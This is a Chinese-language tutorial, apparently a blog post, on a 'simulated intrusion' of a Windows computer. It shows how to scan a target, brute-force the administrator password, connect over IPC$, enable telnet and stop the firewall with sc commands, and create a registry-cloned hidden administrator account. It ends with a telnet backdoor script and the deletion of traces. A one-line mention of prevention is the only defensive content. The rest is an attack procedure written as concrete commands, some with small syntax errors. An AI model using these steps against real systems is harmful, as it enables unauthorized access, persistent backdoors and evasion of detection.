实验名称: 模拟******计算机
实验需求描述 : 通过模拟***实验明白******原理,做好防范。
试验步骤:
一:扫描目标计算机
使用扫描软件扫描目标计算机,确定开放的端口,判断操作系统的类型。
扫描软件推荐使用X-Scan,SuperScan,Nmap和流光
在这里使用X-Scan
![](https://s1.51cto.com/attachment/201004/201004261272281455734.jpg)
二:获得管理权限
根据扫描结果,尝试暴力破解管理员账户的密码。X-Scan,流光,LC5等软件都提供了暴力破解功能,破解后会自动生成报告
![](https://s1.51cto.com/attachment/201004/201004261272281572406.png)
![](https://s1.51cto.com/attachment/201004/201004261272281611375.png)
![](https://s1.51cto.com/attachment/201004/201004261272281633093.png)
三:***目标计算机(必须知道了破解了密码,否则一切免谈)
1. 使用管理员的账户建立IPC链接,命令为“net use \\对方IP 密码 /user:administrator”
![](https://s1.51cto.com/attachment/201004/201004261272281737390.jpg)
![](https://s1.51cto.com/attachment/201004/201004261272281775750.jpg)
1. 使用sc命令目标计算机的所有服务列表,并保存到本地,命令为“sc \对方IP query type= service state= all >c:\yue.txt”
![](https://s1.51cto.com/attachment/201004/201004261272281818718.jpg)
到c盘,打开yue.txt文件,找到telnet,确认telnet的服务状态(默认为禁用状态)
如果知道telnet的服务名称,可以直接使用命令行查看,命令为“sc \\IP qc tlntsvr”
去除telnet服务的禁用状态,设置为自动运行,命令为“sc \\IP config tlntsvr start= auto”.
![](https://s1.51cto.com/attachment/201004/201004261272282118531.jpg)
1. 然后启用telnet服务,命令为“sc \\IP start tlntsvr”.
停用目标计算机的windows防火墙,命令为“sc \\IP stop sharedaccess”.
确认目标计算机启用了远程注册表服务,命令为“sc \\IP qc romoteregistry”如果该服务为停用状态,则启用。
四:添加隐藏用户
1.建立telnet连接,管理目标计算机,命令为“telnet IP”连接成功后输入管理员的账户和密码
![](https://s1.51cto.com/attachment/201004/201004261272282271406.jpg)
![](https://s1.51cto.com/attachment/201004/201004261272282344953.jpg)
![](https://s1.51cto.com/attachment/201004/201004261272282382812.jpg)
通过telnet,在目标计算机上建立隐藏账户,命令为“net user 名字$ 密码/add”.
![](https://s1.51cto.com/attachment/201004/201004261272282427718.jpg)
在本地运行“RegEdit”,在注册表编辑器中选择“文件-连接网络注册表”在选择计算机的窗口中输入目标计算机的地址,并提供目标计算机的用户名和密码。
打开目标计算机的注册表,右击“HKEY_LOCAL_MACHINE”项下的“SAM”项下的“SAM”选择“权限”
![](https://s1.51cto.com/attachment/201004/201004261272287234500.jpg)
在SAN权限窗口中,赋予管理员完全控制权限,断开与目标计算机的连接,然后重新建立连接。
展开目标计算机的
”
展开目标计算机 “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位1F4的子项,该项和administrator相对应
![](https://s1.51cto.com/attachment/201004/201004261272287522078.jpg)
双击右侧窗格1F4下的F键值,复制F值下的全部数据
![](https://s1.51cto.com/attachment/201004/201004261272287563562.jpg)
展开目标计算机
“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位3EE的子项,使用从1F4项复制的数据覆盖3EE项F键值的数据
![](https://s1.51cto.com/attachment/201004/201004261272287605812.jpg)
导出目标计算机注册表的yezi$项和000003EE项保存到本地,并命名一下,后缀是.reg格式。
![](https://s1.51cto.com/attachment/201004/201004261272287686812.jpg)
返回到telnet命令行,删除目标计算机的账户yezi$,命令为“net user yezi$/delete”.
![](https://s1.51cto.com/attachment/201004/201004261272287782171.jpg)
在目标计算机上导入yezi1.reg和yezi.reg.命令为“reg import yezi1.reg和reg import yezi2.reg”.完成本步后将真正的在目标计算机上建立一个隐藏用户。使用命令行或图形工具都不能查看到,但在注册表中可以看见。
![](https://s1.51cto.com/attachment/201004/201004261272287837828.jpg)
删除目前和目标计算机的IPC连接,命令为“net user \\对方IP delete”.
![](https://s1.51cto.com/attachment/201004/201004261272288057484.png)
打开目标计算机的注册表,右击
“HKEY_LOCAL_MACHINE\SAM\SAM”选择“权限”取出管理员的读取和完全控制权限,恢复到默认状态。
五:保留管理后门,隐藏***痕迹。
在本地建立一个名为open23.bat的脚本文件,内容
如下;将其拷贝到“\\目标IP\C$下。
![](https://s1.51cto.com/attachment/201004/201004261272288428734.jpg)
![](https://s1.51cto.com/attachment/201004/201004261272288442203.jpg)
建立telnet连接,进入目标计算机的C盘运行open23.bat脚本。运行成功后重新启动windows防火墙,并且开启TCP和UDP的23端口以允许telnet连接通过防火墙,
最后,删除目标计算机上的遗留文件,如;open23.bat.从此以后,可以在目标计算机上来去自如,跟主人一样